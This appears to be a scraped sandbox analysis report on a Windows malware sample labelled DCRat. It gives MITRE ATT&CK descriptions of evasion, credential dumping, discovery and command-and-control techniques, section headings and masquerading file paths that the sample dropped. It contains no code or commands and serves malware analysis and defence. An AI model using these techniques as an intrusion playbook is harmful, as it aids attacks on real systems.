Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Dfim58cp4J.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Java\0d889c0c136da2

C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\c5b4cb5e9653cc

C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe

C:\ServerfontSessiondhcpcommon\0d889c0c136da2

C:\ServerfontSessiondhcpcommon\27d1bcfc3c54e0

C:\ServerfontSessiondhcpcommon\6dd19aba3e2428

C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe

Windows Analysis Report
Dfim58cp4J.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre